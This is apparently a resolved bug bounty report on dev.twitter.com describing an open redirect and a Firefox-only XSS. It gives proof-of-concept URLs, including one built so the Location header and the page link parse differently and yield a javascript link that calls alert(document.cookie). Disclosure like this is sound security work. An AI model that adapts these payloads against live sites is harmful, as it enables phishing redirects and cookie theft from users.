[dev.twitter.com] XSS and Open Redirect
Medium
X
X (Formerly Twitter)
Submitted None
Actions:
Reported by
bobrov
Vulnerability Details
Technical details and impact analysis
Description
===
XSS via Request-URI which requires user interaction. The vulnerability is caused by the difference in the Request-URI processing in the Location header and in the link on the page.
By creating an incorrect port in the link on the Location header, you can block the redirection for the FireFox browser. Next, using the difference in the processing, generate a "javascript" link on the page.
PoC: Open Redirect
===
Browsers: Chrome, FireFox, Opera
```
https://dev.twitter.com/https:/%5cblackfan.ru/
```
HTTP Response:
```http
HTTP/1.1 302 Found
connection: close
...
location: https:/\blackfan.ru
```
PoC: XSS
===
Browsers: FireFox
Steps to reproduce: Open and click the link
```
https://dev.twitter.com//x:1/:///%01blocked:alert(document.cookie)/
```
HTTP Response:
```http
HTTP/1.1 302 Found
connection: close
...
location: //x:1/://dev.twitter.com/blocked:alert(document.cookie)
...
<p>You should be redirected automatically to target URL: <a href="blocked:alert(document.cookie)">blocked:alert(document.cookie)</a>. If not click the link.
```
{F213436}
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Bounty
$1120.00